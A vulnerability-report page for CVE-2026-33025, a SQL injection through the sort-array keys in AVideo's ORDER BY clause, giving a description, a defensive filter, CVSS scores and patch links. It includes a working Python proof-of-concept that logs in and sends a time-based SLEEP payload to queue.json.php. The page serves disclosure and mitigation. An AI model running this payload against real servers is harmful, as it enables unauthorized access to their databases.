Security Vulnerability Report
CVE-2026-33025 CVSS 8.8 HIGH

CVE-2026-33025

Published: 2026-03-20 05:16:16
Last Modified: 2026-03-24 16:32:12

Description

AVideo is a video-sharing platform. Versions prior to 8.0 contain a SQL injection vulnerability in the getSqlFromPost() method of Object.php. The $_POST['sort'] array keys are used directly as SQL column identifiers inside an ORDER BY clause. Although real_escape_string() was applied, it only escapes string-context characters (quotes, null bytes) and provides no protection for SQL identifiers, making it entirely ineffective here. This issue has been fixed in version 8.0. To work around this issue without upgrading, operators can apply a WAF rule to block POST requests where any sort[*] key contains characters outside [A-Za-z0-9_]. Alternatively, restrict access to the queue view (queue.json.php, index.php) to trusted IP ranges only.
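The workaround rule described above, written as a request-body filter. This is an added example, not code from the AVideo project or its patch: `string_escape` is a simplified model of string-context escaping, the column name `created` is hypothetical, and both sample bodies are constructed.

```python
from urllib.parse import parse_qsl, urlencode
import re

# Characters that string-context escaping rewrites (simplified model of
# mysqli real_escape_string); identifier syntax such as ( ) , = is untouched.
_STRING_ESCAPES = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
                   "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
SAFE_KEY = re.compile(r"[A-Za-z0-9_]+")  # allowlist stated in the advisory


def string_escape(value):
    """Escape a value for use inside a quoted SQL string literal."""
    return "".join(_STRING_ESCAPES.get(ch, ch) for ch in value)


def sort_keys(body):
    """Return the key of every sort[...] field in a urlencoded POST body."""
    keys = []
    for name, _ in parse_qsl(body, keep_blank_values=True):
        if name.startswith("sort["):
            key = name[len("sort["):]
            # Malformed names (no closing bracket) are kept so they get checked.
            keys.append(key[:-1] if key.endswith("]") else key)
    return keys


def should_block(body):
    """True when any sort[*] key has characters outside [A-Za-z0-9_]."""
    return any(not SAFE_KEY.fullmatch(key) for key in sort_keys(body))


# Constructed sample bodies (not captured traffic).
BENIGN = urlencode({"sort[created]": "DESC", "rowCount": "10"})
SUSPECT = urlencode({"sort[IF(1=1,SLEEP(5),0)]": "ASC"})  # key from the PoC on this page

if __name__ == "__main__":
    for body in (BENIGN, SUSPECT):
        for key in sort_keys(body):
            # Escaping leaves the suspect key byte-for-byte identical.
            print(key, "| escaped unchanged:", string_escape(key) == key,
                  "| block:", should_block(body))
```

The filter is deliberately conservative: an empty key (`sort[]`) or a nested key (`sort[a][b]`) fails the allowlist and is blocked.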

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:* - VULNERABLE
AVideo < 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: AVideo < 8.0 - SQL Injection (Authenticated)
# Date: 2026-03-20
# Exploit Author: Analyst
# Vendor Homepage: https://avideo.com/
# Software Link: https://github.com/WWBN/AVideo
# Version: < 8.0
# CVE: CVE-2026-33025


def exploit(url, username, password):
    session = requests.Session()

    # 1. Login (Assuming standard login endpoint)
    login_payload = {
        'user': username,
        'pass': password,
        'login': 'Login'
    }
    session.post(f"{url}/userLogin", data=login_payload)

    # 2. Send malicious payload to queue view
    # The vulnerability is in the 'sort' array keys in getSqlFromPost()
    # Injection point: ORDER BY [KEY]
    # Payload: IF(1=1,SLEEP(5),0)
    injection_payload = {
        'sort[IF(1=1,SLEEP(5),0)]': 'ASC'
    }
    response = session.post(f"{url}/queue.json.php", data=injection_payload)

    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed! SQL Injection successful.")
    else:
        print("[-] Failed to confirm vulnerability.")


if __name__ == "__main__":
    target_url = "http://localhost/avideo"
    exploit(target_url, "admin", "password")
```

References

https://github.com/WWBN/AVideo-Encoder/commit/d1c8a17ac88b5e27da9dfb7a230bbaf54aa53124 (Patch)
https://github.com/WWBN/AVideo-Encoder/security/advisories/GHSA-5qvj-5h75-27pj (Mitigation, Vendor Advisory)

Additional Details

Status: Analyzed
Weakness: CWE-89
CVSS 4.0 Score (Secondary): 8.6 HIGH
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 3.1 Exploitability Score: 2.8
CVSS 3.1 Impact Score: 5.9